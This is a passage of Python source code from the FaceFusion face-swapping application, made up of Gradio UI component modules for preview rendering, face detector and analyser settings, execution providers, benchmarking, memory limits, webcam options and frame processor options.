facefusion.filesystem import is_image, is_video, filter_audio_paths from facefusion.content_analyser import analyse_frame from facefusion.processors.frame.core import load_frame_processor_module from facefusion.uis.core import get_ui_component, get_ui_components, register_ui_component PREVIEW_IMAGE : Optional[gradio.Image] = None PREVIEW_FRAME_SLIDER : Optional[gradio.Slider] = None def render() -> None: global PREVIEW_IMAGE global PREVIEW_FRAME_SLIDER preview_image_args : Dict[str, Any] =\ { 'label': wording.get('uis.preview_image'), 'interactive': False } preview_frame_slider_args : Dict[str, Any] =\ { 'label': wording.get('uis.preview_frame_slider'), 'step': 1, 'minimum': 0, 'maximum': 100, 'visible': False } conditional_append_reference_faces() reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None source_frames = read_static_images(facefusion.globals.source_paths) source_face = get_average_face(source_frames) source_audio_path = get_first(filter_audio_paths(facefusion.globals.source_paths)) source_audio_frame = create_empty_audio_frame() if source_audio_path and facefusion.globals.output_video_fps and facefusion.globals.reference_frame_number: temp_audio_frame = get_audio_frame(source_audio_path, facefusion.globals.output_video_fps, facefusion.globals.reference_frame_number) if numpy.any(temp_audio_frame): source_audio_frame = temp_audio_frame if is_image(facefusion.globals.target_path): target_vision_frame = read_static_image(facefusion.globals.target_path) preview_vision_frame = process_preview_frame(reference_faces, source_face, source_audio_frame, target_vision_frame) preview_image_args['value'] = normalize_frame_color(preview_vision_frame) if is_video(facefusion.globals.target_path): temp_vision_frame = get_video_frame(facefusion.globals.target_path, facefusion.globals.reference_frame_number) preview_vision_frame = process_preview_frame(reference_faces, source_face, source_audio_frame, temp_vision_frame) preview_image_args['value'] = normalize_frame_color(preview_vision_frame) preview_image_args['visible'] = True preview_frame_slider_args['value'] = facefusion.globals.reference_frame_number preview_frame_slider_args['maximum'] = count_video_frame_total(facefusion.globals.target_path) preview_frame_slider_args['visible'] = True PREVIEW_IMAGE = gradio.Image(**preview_image_args) PREVIEW_FRAME_SLIDER = gradio.Slider(**preview_frame_slider_args) register_ui_component('preview_frame_slider', PREVIEW_FRAME_SLIDER) def listen() -> None: PREVIEW_FRAME_SLIDER.release(update_preview_image, inputs = PREVIEW_FRAME_SLIDER, outputs = PREVIEW_IMAGE) reference_face_position_gallery = get_ui_component('reference_face_position_gallery') if reference_face_position_gallery: reference_face_position_gallery.select(update_preview_image, inputs = PREVIEW_FRAME_SLIDER, outputs = PREVIEW_IMAGE) for ui_component in get_ui_components( [ 'source_audio', 'source_image', 'target_image', 'target_video' ]): for method in [ 'upload', 'change', 'clear' ]: getattr(ui_component, method)(update_preview_image, inputs = PREVIEW_FRAME_SLIDER, outputs = PREVIEW_IMAGE) for ui_component in get_ui_components( [ 'target_image', 'target_video' ]): for method in [ 'upload', 'change', 'clear' ]: getattr(ui_component, method)(update_preview_frame_slider, outputs = PREVIEW_FRAME_SLIDER) for ui_component in get_ui_components( [ 'face_debugger_items_checkbox_group', 'frame_colorizer_size_dropdown', 'face_selector_mode_dropdown', 'face_mask_types_checkbox_group', 'face_mask_region_checkbox_group', 'face_analyser_order_dropdown', 'face_analyser_age_dropdown', 'face_analyser_gender_dropdown' ]): ui_component.change(update_preview_image, inputs = PREVIEW_FRAME_SLIDER, outputs = PREVIEW_IMAGE) for ui_component in get_ui_components( [ 'face_enhancer_blend_slider', 'frame_colorizer_blend_slider', 'frame_enhancer_blend_slider', 'trim_frame_start_slider', 'trim_frame_end_slider', 'reference_face_distance_slider', 'face_mask_blur_slider', 'face_mask_padding_top_slider', 'face_mask_padding_bottom_slider', 'face_mask_padding_left_slider', 'face_mask_padding_right_slider', 'output_video_fps_slider' ]): ui_component.release(update_preview_image, inputs = PREVIEW_FRAME_SLIDER, outputs = PREVIEW_IMAGE) for ui_component in get_ui_components( [ 'frame_processors_checkbox_group', 'face_enhancer_model_dropdown', 'face_swapper_model_dropdown', 'frame_colorizer_model_dropdown', 'frame_enhancer_model_dropdown', 'lip_syncer_model_dropdown', 'face_detector_model_dropdown', 'face_detector_size_dropdown' ]): ui_component.change(clear_and_update_preview_image, inputs = PREVIEW_FRAME_SLIDER, outputs = PREVIEW_IMAGE) for ui_component in get_ui_components( [ 'face_detector_score_slider', 'face_landmarker_score_slider' ]): ui_component.release(clear_and_update_preview_image, inputs = PREVIEW_FRAME_SLIDER, outputs = PREVIEW_IMAGE) def clear_and_update_preview_image(frame_number : int = 0) -> gradio.Image: clear_face_analyser() clear_reference_faces() clear_static_faces() return update_preview_image(frame_number) def update_preview_image(frame_number : int = 0) -> gradio.Image: for frame_processor in facefusion.globals.frame_processors: frame_processor_module = load_frame_processor_module(frame_processor) while not frame_processor_module.post_check(): logger.disable() sleep(0.5) logger.enable() conditional_append_reference_faces() reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None source_frames = read_static_images(facefusion.globals.source_paths) source_face = get_average_face(source_frames) source_audio_path = get_first(filter_audio_paths(facefusion.globals.source_paths)) source_audio_frame = create_empty_audio_frame() if source_audio_path and facefusion.globals.output_video_fps and facefusion.globals.reference_frame_number: reference_audio_frame_number = facefusion.globals.reference_frame_number if facefusion.globals.trim_frame_start: reference_audio_frame_number -= facefusion.globals.trim_frame_start temp_audio_frame = get_audio_frame(source_audio_path, facefusion.globals.output_video_fps, reference_audio_frame_number) if numpy.any(temp_audio_frame): source_audio_frame = temp_audio_frame if is_image(facefusion.globals.target_path): target_vision_frame = read_static_image(facefusion.globals.target_path) preview_vision_frame = process_preview_frame(reference_faces, source_face, source_audio_frame, target_vision_frame) preview_vision_frame = normalize_frame_color(preview_vision_frame) return gradio.Image(value = preview_vision_frame) if is_video(facefusion.globals.target_path): temp_vision_frame = get_video_frame(facefusion.globals.target_path, frame_number) preview_vision_frame = process_preview_frame(reference_faces, source_face, source_audio_frame, temp_vision_frame) preview_vision_frame = normalize_frame_color(preview_vision_frame) return gradio.Image(value = preview_vision_frame) return gradio.Image(value = None) def update_preview_frame_slider() -> gradio.Slider: if is_video(facefusion.globals.target_path): video_frame_total = count_video_frame_total(facefusion.globals.target_path) return gradio.Slider(maximum = video_frame_total, visible = True) return gradio.Slider(value = None, maximum = None, visible = False) def process_preview_frame(reference_faces : FaceSet, source_face : Face, source_audio_frame : AudioFrame, target_vision_frame : VisionFrame) -> VisionFrame: target_vision_frame = resize_frame_resolution(target_vision_frame, (640, 640)) if analyse_frame(target_vision_frame): return cv2.GaussianBlur(target_vision_frame, (99, 99), 0) for frame_processor in facefusion.globals.frame_processors: frame_processor_module = load_frame_processor_module(frame_processor) logger.disable() if frame_processor_module.pre_process('preview'): logger.enable() target_vision_frame = frame_processor_module.process_frame( { 'reference_faces': reference_faces, 'source_face': source_face, 'source_audio_frame': source_audio_frame, 'target_vision_frame': target_vision_frame }) return target_vision_frame File: facefusion/uis/components/face_analyser.py from typing import Optional, Dict, Any, Tuple import gradio import facefusion.globals import facefusion.choices from facefusion import face_analyser, wording from facefusion.typing import FaceAnalyserOrder, FaceAnalyserAge, FaceAnalyserGender, FaceDetectorModel from facefusion.uis.core import register_ui_component FACE_ANALYSER_ORDER_DROPDOWN : Optional[gradio.Dropdown] = None FACE_ANALYSER_AGE_DROPDOWN : Optional[gradio.Dropdown] = None FACE_ANALYSER_GENDER_DROPDOWN : Optional[gradio.Dropdown] = None FACE_DETECTOR_MODEL_DROPDOWN : Optional[gradio.Dropdown] = None FACE_DETECTOR_SIZE_DROPDOWN : Optional[gradio.Dropdown] = None FACE_DETECTOR_SCORE_SLIDER : Optional[gradio.Slider] = None FACE_LANDMARKER_SCORE_SLIDER : Optional[gradio.Slider] = None def render() -> None: global FACE_ANALYSER_ORDER_DROPDOWN global FACE_ANALYSER_AGE_DROPDOWN global FACE_ANALYSER_GENDER_DROPDOWN global FACE_DETECTOR_MODEL_DROPDOWN global FACE_DETECTOR_SIZE_DROPDOWN global FACE_DETECTOR_SCORE_SLIDER global FACE_LANDMARKER_SCORE_SLIDER face_detector_size_dropdown_args : Dict[str, Any] =\ { 'label': wording.get('uis.face_detector_size_dropdown'), 'value': facefusion.globals.face_detector_size } if facefusion.globals.face_detector_size in facefusion.choices.face_detector_set[facefusion.globals.face_detector_model]: face_detector_size_dropdown_args['choices'] = facefusion.choices.face_detector_set[facefusion.globals.face_detector_model] with gradio.Row(): FACE_ANALYSER_ORDER_DROPDOWN = gradio.Dropdown( label = wording.get('uis.face_analyser_order_dropdown'), choices = facefusion.choices.face_analyser_orders, value = facefusion.globals.face_analyser_order ) FACE_ANALYSER_AGE_DROPDOWN = gradio.Dropdown( label = wording.get('uis.face_analyser_age_dropdown'), choices = [ 'none' ] + facefusion.choices.face_analyser_ages, value = facefusion.globals.face_analyser_age or 'none' ) FACE_ANALYSER_GENDER_DROPDOWN = gradio.Dropdown( label = wording.get('uis.face_analyser_gender_dropdown'), choices = [ 'none' ] + facefusion.choices.face_analyser_genders, value = facefusion.globals.face_analyser_gender or 'none' ) FACE_DETECTOR_MODEL_DROPDOWN = gradio.Dropdown( label = wording.get('uis.face_detector_model_dropdown'), choices = facefusion.choices.face_detector_set.keys(), value = facefusion.globals.face_detector_model ) FACE_DETECTOR_SIZE_DROPDOWN = gradio.Dropdown(**face_detector_size_dropdown_args) with gradio.Row(): FACE_DETECTOR_SCORE_SLIDER = gradio.Slider( label = wording.get('uis.face_detector_score_slider'), value = facefusion.globals.face_detector_score, step = facefusion.choices.face_detector_score_range[1] - facefusion.choices.face_detector_score_range[0], minimum = facefusion.choices.face_detector_score_range[0], maximum = facefusion.choices.face_detector_score_range[-1] ) FACE_LANDMARKER_SCORE_SLIDER = gradio.Slider( label = wording.get('uis.face_landmarker_score_slider'), value = facefusion.globals.face_landmarker_score, step = facefusion.choices.face_landmarker_score_range[1] - facefusion.choices.face_landmarker_score_range[0], minimum = facefusion.choices.face_landmarker_score_range[0], maximum = facefusion.choices.face_landmarker_score_range[-1] ) register_ui_component('face_analyser_order_dropdown', FACE_ANALYSER_ORDER_DROPDOWN) register_ui_component('face_analyser_age_dropdown', FACE_ANALYSER_AGE_DROPDOWN) register_ui_component('face_analyser_gender_dropdown', FACE_ANALYSER_GENDER_DROPDOWN) register_ui_component('face_detector_model_dropdown', FACE_DETECTOR_MODEL_DROPDOWN) register_ui_component('face_detector_size_dropdown', FACE_DETECTOR_SIZE_DROPDOWN) register_ui_component('face_detector_score_slider', FACE_DETECTOR_SCORE_SLIDER) register_ui_component('face_landmarker_score_slider', FACE_LANDMARKER_SCORE_SLIDER) def listen() -> None: FACE_ANALYSER_ORDER_DROPDOWN.change(update_face_analyser_order, inputs = FACE_ANALYSER_ORDER_DROPDOWN) FACE_ANALYSER_AGE_DROPDOWN.change(update_face_analyser_age, inputs = FACE_ANALYSER_AGE_DROPDOWN) FACE_ANALYSER_GENDER_DROPDOWN.change(update_face_analyser_gender, inputs = FACE_ANALYSER_GENDER_DROPDOWN) FACE_DETECTOR_MODEL_DROPDOWN.change(update_face_detector_model, inputs = FACE_DETECTOR_MODEL_DROPDOWN, outputs = [ FACE_DETECTOR_MODEL_DROPDOWN, FACE_DETECTOR_SIZE_DROPDOWN ]) FACE_DETECTOR_SIZE_DROPDOWN.change(update_face_detector_size, inputs = FACE_DETECTOR_SIZE_DROPDOWN) FACE_DETECTOR_SCORE_SLIDER.release(update_face_detector_score, inputs = FACE_DETECTOR_SCORE_SLIDER) FACE_LANDMARKER_SCORE_SLIDER.release(update_face_landmarker_score, inputs = FACE_LANDMARKER_SCORE_SLIDER) def update_face_analyser_order(face_analyser_order : FaceAnalyserOrder) -> None: facefusion.globals.face_analyser_order = face_analyser_order if face_analyser_order != 'none' else None def update_face_analyser_age(face_analyser_age : FaceAnalyserAge) -> None: facefusion.globals.face_analyser_age = face_analyser_age if face_analyser_age != 'none' else None def update_face_analyser_gender(face_analyser_gender : FaceAnalyserGender) -> None: facefusion.globals.face_analyser_gender = face_analyser_gender if face_analyser_gender != 'none' else None def update_face_detector_model(face_detector_model : FaceDetectorModel) -> Tuple[gradio.Dropdown, gradio.Dropdown]: facefusion.globals.face_detector_model = face_detector_model update_face_detector_size('640x640') if face_analyser.pre_check(): if facefusion.globals.face_detector_size in facefusion.choices.face_detector_set[face_detector_model]: return gradio.Dropdown(value = facefusion.globals.face_detector_model), gradio.Dropdown(value = facefusion.globals.face_detector_size, choices = facefusion.choices.face_detector_set[face_detector_model]) return gradio.Dropdown(value = facefusion.globals.face_detector_model), gradio.Dropdown(value = facefusion.globals.face_detector_size, choices = [ facefusion.globals.face_detector_size ]) return gradio.Dropdown(), gradio.Dropdown() def update_face_detector_size(face_detector_size : str) -> None: facefusion.globals.face_detector_size = face_detector_size def update_face_detector_score(face_detector_score : float) -> None: facefusion.globals.face_detector_score = face_detector_score def update_face_landmarker_score(face_landmarker_score : float) -> None: facefusion.globals.face_landmarker_score = face_landmarker_score File: facefusion/uis/components/execution.py from typing import List, Optional import gradio import onnxruntime import facefusion.globals from facefusion import wording from facefusion.face_analyser import clear_face_analyser from facefusion.processors.frame.core import clear_frame_processors_modules from facefusion.execution import encode_execution_providers, decode_execution_providers EXECUTION_PROVIDERS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None def render() -> None: global EXECUTION_PROVIDERS_CHECKBOX_GROUP EXECUTION_PROVIDERS_CHECKBOX_GROUP = gradio.CheckboxGroup( label = wording.get('uis.execution_providers_checkbox_group'), choices = encode_execution_providers(onnxruntime.get_available_providers()), value = encode_execution_providers(facefusion.globals.execution_providers) ) def listen() -> None: EXECUTION_PROVIDERS_CHECKBOX_GROUP.change(update_execution_providers, inputs = EXECUTION_PROVIDERS_CHECKBOX_GROUP, outputs = EXECUTION_PROVIDERS_CHECKBOX_GROUP) def update_execution_providers(execution_providers : List[str]) -> gradio.CheckboxGroup: clear_face_analyser() clear_frame_processors_modules() execution_providers = execution_providers or encode_execution_providers(onnxruntime.get_available_providers()) facefusion.globals.execution_providers = decode_execution_providers(execution_providers) return gradio.CheckboxGroup(value = execution_providers) File: facefusion/uis/components/benchmark.py from typing import Any, Optional, List, Dict, Generator from time import sleep, perf_counter import tempfile import statistics import gradio import facefusion.globals from facefusion import process_manager, wording from facefusion.face_store import clear_static_faces from facefusion.processors.frame.core import get_frame_processors_modules from facefusion.vision import count_video_frame_total, detect_video_resolution, detect_video_fps, pack_resolution from facefusion.core import conditional_process from facefusion.memory import limit_system_memory from facefusion.filesystem import clear_temp from facefusion.uis.core import get_ui_component BENCHMARK_RESULTS_DATAFRAME : Optional[gradio.Dataframe] = None BENCHMARK_START_BUTTON : Optional[gradio.Button] = None BENCHMARK_CLEAR_BUTTON : Optional[gradio.Button] = None BENCHMARKS : Dict[str, str] =\ { '240p': '.assets/examples/target-240p.mp4', '360p': '.assets/examples/target-360p.mp4', '540p': '.assets/examples/target-540p.mp4', '720p': '.assets/examples/target-720p.mp4', '1080p': '.assets/examples/target-1080p.mp4', '1440p': '.assets/examples/target-1440p.mp4', '2160p': '.assets/examples/target-2160p.mp4' } def render() -> None: global BENCHMARK_RESULTS_DATAFRAME global BENCHMARK_START_BUTTON global BENCHMARK_CLEAR_BUTTON BENCHMARK_RESULTS_DATAFRAME = gradio.Dataframe( label = wording.get('uis.benchmark_results_dataframe'), headers = [ 'target_path', 'benchmark_cycles', 'average_run', 'fastest_run', 'slowest_run', 'relative_fps' ], datatype = [ 'str', 'number', 'number', 'number', 'number', 'number' ] ) BENCHMARK_START_BUTTON = gradio.Button( value = wording.get('uis.start_button'), variant = 'primary', size = 'sm' ) BENCHMARK_CLEAR_BUTTON = gradio.Button( value = wording.get('uis.clear_button'), size = 'sm' ) def listen() -> None: benchmark_runs_checkbox_group = get_ui_component('benchmark_runs_checkbox_group') benchmark_cycles_slider = get_ui_component('benchmark_cycles_slider') if benchmark_runs_checkbox_group and benchmark_cycles_slider: BENCHMARK_START_BUTTON.click(start, inputs = [ benchmark_runs_checkbox_group, benchmark_cycles_slider ], outputs = BENCHMARK_RESULTS_DATAFRAME) BENCHMARK_CLEAR_BUTTON.click(clear, outputs = BENCHMARK_RESULTS_DATAFRAME) def start(benchmark_runs : List[str], benchmark_cycles : int) -> Generator[List[Any], None, None]: facefusion.globals.source_paths = [ '.assets/examples/source.jpg', '.assets/examples/source.mp3' ] facefusion.globals.output_path = tempfile.gettempdir() facefusion.globals.face_landmarker_score = 0 facefusion.globals.temp_frame_format = 'bmp' facefusion.globals.output_video_preset = 'ultrafast' benchmark_results = [] target_paths = [ BENCHMARKS[benchmark_run] for benchmark_run in benchmark_runs if benchmark_run in BENCHMARKS ] if target_paths: pre_process() for target_path in target_paths: facefusion.globals.target_path = target_path benchmark_results.append(benchmark(benchmark_cycles)) yield benchmark_results post_process() def pre_process() -> None: if facefusion.globals.system_memory_limit > 0: limit_system_memory(facefusion.globals.system_memory_limit) for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): frame_processor_module.get_frame_processor() def post_process() -> None: clear_static_faces() def benchmark(benchmark_cycles : int) -> List[Any]: process_times = [] video_frame_total = count_video_frame_total(facefusion.globals.target_path) output_video_resolution = detect_video_resolution(facefusion.globals.target_path) facefusion.globals.output_video_resolution = pack_resolution(output_video_resolution) facefusion.globals.output_video_fps = detect_video_fps(facefusion.globals.target_path) for index in range(benchmark_cycles): start_time = perf_counter() conditional_process() end_time = perf_counter() process_times.append(end_time - start_time) average_run = round(statistics.mean(process_times), 2) fastest_run = round(min(process_times), 2) slowest_run = round(max(process_times), 2) relative_fps = round(video_frame_total * benchmark_cycles / sum(process_times), 2) return\ [ facefusion.globals.target_path, benchmark_cycles, average_run, fastest_run, slowest_run, relative_fps ] def clear() -> gradio.Dataframe: while process_manager.is_processing(): sleep(0.5) if facefusion.globals.target_path: clear_temp(facefusion.globals.target_path) return gradio.Dataframe(value = None) File: facefusion/uis/components/memory.py from typing import Optional import gradio import facefusion.globals import facefusion.choices from facefusion.typing import VideoMemoryStrategy from facefusion import wording VIDEO_MEMORY_STRATEGY_DROPDOWN : Optional[gradio.Dropdown] = None SYSTEM_MEMORY_LIMIT_SLIDER : Optional[gradio.Slider] = None def render() -> None: global VIDEO_MEMORY_STRATEGY_DROPDOWN global SYSTEM_MEMORY_LIMIT_SLIDER VIDEO_MEMORY_STRATEGY_DROPDOWN = gradio.Dropdown( label = wording.get('uis.video_memory_strategy_dropdown'), choices = facefusion.choices.video_memory_strategies, value = facefusion.globals.video_memory_strategy ) SYSTEM_MEMORY_LIMIT_SLIDER = gradio.Slider( label = wording.get('uis.system_memory_limit_slider'), step =facefusion.choices.system_memory_limit_range[1] - facefusion.choices.system_memory_limit_range[0], minimum = facefusion.choices.system_memory_limit_range[0], maximum = facefusion.choices.system_memory_limit_range[-1], value = facefusion.globals.system_memory_limit ) def listen() -> None: VIDEO_MEMORY_STRATEGY_DROPDOWN.change(update_video_memory_strategy, inputs = VIDEO_MEMORY_STRATEGY_DROPDOWN) SYSTEM_MEMORY_LIMIT_SLIDER.release(update_system_memory_limit, inputs = SYSTEM_MEMORY_LIMIT_SLIDER) def update_video_memory_strategy(video_memory_strategy : VideoMemoryStrategy) -> None: facefusion.globals.video_memory_strategy = video_memory_strategy def update_system_memory_limit(system_memory_limit : int) -> None: facefusion.globals.system_memory_limit = system_memory_limit File: facefusion/uis/components/webcam_options.py from typing import Optional import gradio from facefusion import wording from facefusion.uis import choices as uis_choices from facefusion.uis.core import register_ui_component WEBCAM_MODE_RADIO : Optional[gradio.Radio] = None WEBCAM_RESOLUTION_DROPDOWN : Optional[gradio.Dropdown] = None WEBCAM_FPS_SLIDER : Optional[gradio.Slider] = None def render() -> None: global WEBCAM_MODE_RADIO global WEBCAM_RESOLUTION_DROPDOWN global WEBCAM_FPS_SLIDER WEBCAM_MODE_RADIO = gradio.Radio( label = wording.get('uis.webcam_mode_radio'), choices = uis_choices.webcam_modes, value = 'inline' ) WEBCAM_RESOLUTION_DROPDOWN = gradio.Dropdown( label = wording.get('uis.webcam_resolution_dropdown'), choices = uis_choices.webcam_resolutions, value = uis_choices.webcam_resolutions[0] ) WEBCAM_FPS_SLIDER = gradio.Slider( label = wording.get('uis.webcam_fps_slider'), value = 25, step = 1, minimum = 1, maximum = 60 ) register_ui_component('webcam_mode_radio', WEBCAM_MODE_RADIO) register_ui_component('webcam_resolution_dropdown', WEBCAM_RESOLUTION_DROPDOWN) register_ui_component('webcam_fps_slider', WEBCAM_FPS_SLIDER) File: facefusion/uis/components/frame_processors_options.py from typing import List, Optional, Tuple import gradio import facefusion.globals from facefusion import face_analyser, wording from facefusion.processors.frame.core import load_frame_processor_module from facefusion.processors.frame import globals as frame_processors_globals, choices as frame_processors_choices from facefusion.processors.frame.typings import FaceDebuggerItem, FaceEnhancerModel, FaceSwapperModel, FrameColorizerModel, FrameEnhancerModel, LipSyncerModel from facefusion.uis.core import get_ui_component, register_ui_component FACE_DEBUGGER_ITEMS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None FACE_ENHANCER_MODEL_DROPDOWN : Optional[gradio.Dropdown] = None FACE_ENHANCER_BLEND_SLIDER : Optional[gradio.Slider] = None FACE_SWAPPER_MODEL_DROPDOWN : Optional[gradio.Dropdown] = None FRAME_COLORIZER_MODEL_DROPDOWN : Optional[gradio.Dropdown] = None FRAME_COLORIZER_BLEND_SLIDER : Optional[gradio.Slider] = None FRAME_COLORIZER_SIZE_DROPDOWN : Optional[gradio.Dropdown] = None FRAME_ENHANCER_MODEL_DROPDOWN : Optional[gradio.Dropdown] = None FRAME_ENHANCER_BLEND_SLIDER : Optional[gradio.Slider] = None LIP_SYNCER_MODEL_DROPDOWN : Optional[gradio.Dropdown] = None def render() -> None: global FACE_DEBUGGER_ITEMS_CHECKBOX_GROUP global FACE_ENHANCER_MODEL_DROPDOWN global FACE_ENHANCER_BLEND_SLIDER global FACE_SWAPPER_MODEL_DROPDOWN global FRAME_COLORIZER_MODEL_DROPDOWN global FRAME_COLORIZER_BLEND_SLIDER global FRAME_COLORIZER_SIZE_DROPDOWN global FRAME_ENHANCER_MODEL_DROPDOWN global FRAME_ENHANCER_BLEND_SLIDER global LIP_SYNCER_MODEL_DROPDOWN FACE_DEBUGGER_ITEMS_CHECKBOX_GROUP = gradio.CheckboxGroup( label = wording.get('uis.face_debugger_items_checkbox_group'), choices = frame_processors_choices.face_debugger_items, value = frame_processors_globals.face_debugger_items, visible = 'face_debugger' in facefusion.globals.frame_processors ) FACE_ENHANCER_MODEL_DROPDOWN = gradio.Dropdown( label = wording.get('uis.face_enhancer_model_dropdown'), choices = frame_processors_choices.face_enhancer_models, value = frame_processors_globals.face_enhancer_model, visible = 'face_enhancer' in facefusion.globals.frame_processors ) FACE_ENHANCER_BLEND_SLIDER = gradio.Slider( label = wording.get('uis.face_enhancer_blend_slider'), value = frame_processors_globals.face_enhancer_blend, step = frame_processors_choices.face_enhancer_blend_range[1] - frame_processors_choices.face_enhancer_blend_range[0], minimum = frame_processors_choices.face_enhancer_blend_range[0], maximum = frame_processors_choices.face_enhancer_blend_range[-1], visible = 'face_enhancer' in facefusion.globals.frame_processors ) FACE_SWAPPER_MODEL_DROPDOWN = gradio.Dropdown( label = wording.get('uis.face_swapper_model_dropdown'), choices = frame_processors_choices.face_swapper_models, value = frame_processors_globals.face_swapper_model, visible = 'face_swapper' in facefusion.globals.frame_processors ) FRAME_COLORIZER_MODEL_DROPDOWN = gradio.Dropdown( label = wording.get('uis.frame_colorizer_model_dropdown'), choices = frame_processors_choices.frame_colorizer_models, value = frame_processors_globals.frame_colorizer_model, visible = 'frame_colorizer' in facefusion.globals.frame_processors ) FRAME_COLORIZER_BLEND_SLIDER = gradio.Slider( label = wording.get('uis.frame_colorizer_blend_slider'), value = frame_processors_globals.frame_colorizer_blend, step = frame_processors_choices.frame_colorizer_blend_range[1] - frame_processors_choices.frame_colorizer_blend_range[0], minimum = frame_processors_choices.frame_colorizer_blend_range[0], maximum = frame_processors_choices.frame_colorizer_blend_range[-1], visible = 'frame_colorizer' in facefusion.globals.frame_processors ) FRAME_COLORIZER_SIZE_DROPDOWN = gradio.Dropdown( label = wording.get('uis.frame_colorizer_size_dropdown'), choices = frame_processors_choices.frame_colorizer_sizes, value = frame_processors_globals.frame_colorizer_size, visible = 'frame_colorizer' in facefusion.globals.frame_processors ) FRAME_ENHANCER_MODEL_DROPDOWN = gradio.Dropdown( label = wording.get('uis.frame_enhancer_model_dropdown'), choices = frame_processors_choices.frame_enhancer_models, value = frame_processors_globals.frame_enhancer_model, visible = 'frame_enhancer' in facefusion.globals.frame_processors ) FRAME_ENHANCER_BLEND_SLIDER = gradio.Slider( label = wording.get('uis.frame_enhancer_blend_slider'), value = frame_processors_globals.frame_enhancer_blend, step = frame_processors_choices.frame_enhancer_blend_range[1] - frame_processors_choices.frame_enhancer_blend_range[0], minimum = frame_processors_choices.frame_enhancer_blend_range[0], maximum = frame_processors_choices.frame_enhancer_blend_range[-1], visible = 'frame_enhancer' in facefusion.globals.frame_processors ) LIP_SYNCER_MODEL_DROPDOWN = gradio.Dropdown( label = wording.get('uis.lip_syncer_model_dropdown'), choices = frame_processors_choices.lip_syncer_models, value = frame_processors_globals.lip_syncer_model, visible = 'lip_syncer' in facefusion.globals.frame_processors ) register_ui_component('face_debugger_items_checkbox_group', FACE_DEBUGGER_ITEMS_CHECKBOX_GROUP) register_ui_component('face_enhancer_model_dropdown', FACE_ENHANCER_MODEL_DROPDOWN) register_ui_component('face_enhancer_blend_slider', FACE_ENHANCER_BLEND_SLIDER) register_ui_component('face_swapper_model_dropdown', FACE_SWAPPER_MODEL_DROPDOWN) register_ui_component('frame_colorizer_model_dropdown', FRAME_COLORIZER_MODEL_DROPDOWN) register_ui_component('frame_colorizer_blend_slider', FRAME_COLORIZER_BLEND_SLIDER) register_ui_component('frame_colorizer_size_dropdown', FRAME_COLORIZER_SIZE_DROPDOWN) register_ui_component('frame_enhancer_model_dropdown', FRAME_ENHANCER_MODEL_DROPDOWN) register_ui_component('frame_enhancer_blend_slider', FRAME_ENHANCER_BLEND_SLIDER) register_ui_component('lip_syncer_model_dropdown', LIP_SYNCER_MODEL_DROPDOWN) def listen() -> None: FACE_DEBUGGER_ITEMS_CHECKBOX_GROUP.change(update_face_debugger_items, inputs = FACE_DEBUGGER_ITEMS_CHECKBOX_GROUP) FACE_ENHANCER_MODEL_DROPDOWN.change(update_face_enhancer_model, inputs = FACE_ENHANCER_MODEL_DROPDOWN, outputs = FACE_ENHANCER_MODEL_DROPDOWN) FACE_ENHANCER_BLEND_SLIDER.release(update_face_enhancer_blend, inputs = FACE_ENHANCER_BLEND_SLIDER) FACE_SWAPPER_MODEL_DROPDOWN.change(update_face_swapper_model, inputs = FACE_SWAPPER_MODEL_DROPDOWN, outputs = FACE_SWAPPER_MODEL_DROPDOWN) FRAME_COLORIZER_MODEL_DROPDOWN.change(update_frame_colorizer_model, inputs = FRAME_COLORIZER_MODEL_DROPDOWN, outputs = FRAME_COLORIZER_MODEL_DROPDOWN) FRAME_COLORIZER_BLEND_SLIDER.release(update_frame_colorizer_blend, inputs = FRAME_COLORIZER_BLEND_SLIDER) FRAME_COLORIZER_SIZE_DROPDOWN.change(update_frame_colorizer_size, inputs = FRAME_COLORIZER_SIZE_DROPDOWN, outputs = FRAME_COLORIZER_SIZE_DROPDOWN) FRAME_ENHANCER_MODEL_DROPDOWN.change(update_frame_enhancer_model, inputs = FRAME_ENHANCER_MODEL_DROPDOWN, outputs = FRAME_ENHANCER_MODEL_DROPDOWN) FRAME_ENHANCER_BLEND_SLIDER.release(update_frame_enhancer_blend, inputs = FRAME_ENHANCER_BLEND_SLIDER) LIP_SYNCER_MODEL_DROPDOWN.change(update_lip_syncer_model, inputs = LIP_SYNCER_MODEL_DROPDOWN, outputs = LIP_SYNCER_MODEL_DROPDOWN) frame_processors_checkbox_group = get_ui_component('frame_processors_checkbox_group') if frame_processors_checkbox_group: frame_processors_checkbox_group.change(update_frame_processors, inputs = frame_processors_checkbox_group, outputs = [ FACE_DEBUGGER_ITEMS_CHECKBOX_GROUP, FACE_ENHANCER_MODEL_DROPDOWN, FACE_ENHANCER_BLEND_SLIDER, FACE_SWAPPER_MODEL_DROPDOWN, FRAME_COLORIZER_MODEL_DROPDOWN, FRAME_COLORIZER_BLEND_SLIDER, FRAME_COLORIZER_SIZE_DROPDOWN, FRAME_ENHANCER_MODEL_DROPDOWN, FRAME_ENHANCER_BLEND_SLIDER, LIP_SYNCER_MODEL_DROPDOWN ]) def update_frame_processors(frame_processors : List[str]) -> Tuple[gradio.CheckboxGroup, gradio.Dropdown, gradio.Slider, gradio.Dropdown, gradio.Dropdown, gradio.Slider, gradio.Dropdown, gradio.Dropdown, gradio.Slider, gradio.Dropdown]: has_face_debugger = 'face_debugger' in frame_processors has_face_enhancer = 'face_enhancer' in frame_processors has_face_swapper = 'face_swapper' in frame_processors has_frame_colorizer = 'frame_colorizer' in frame_processors has_frame_enhancer = 'frame_enhancer' in frame_processors has_lip_syncer = 'lip_syncer' in frame_processors return gradio.CheckboxGroup(visible = has_face_debugger), gradio.Dropdown(visible = has_face_enhancer), gradio.Slider(visible = has_face_enhancer), gradio.Dropdown(visible = has_face_swapper), gradio.Dropdown(visible = has_frame_colorizer), gradio.Slider(visible = has_frame_colorizer), gradio.Dropdown(visible = has_frame_colorizer), gradio.Dropdown(visible = has_frame_enhancer), gradio.Slider(visible = has_frame_enhancer), gradio.Dropdown(visible = has_lip_syncer) def update_face_debugger_items(face_debugger_items : List[FaceDebuggerItem]) -> None: frame_processors_globals.face_debugger_items = face_debugger_items def update_face_enhancer_model(face_enhancer_model : FaceEnhancerModel) -> gradio.Dropdown: frame_processors_globals.face_enhancer_model = face_enhancer_model face_enhancer_module = load_frame_processor_module('face_enhancer') face_enhancer_module.clear_frame_processor() face_enhancer_module.set_options('model', 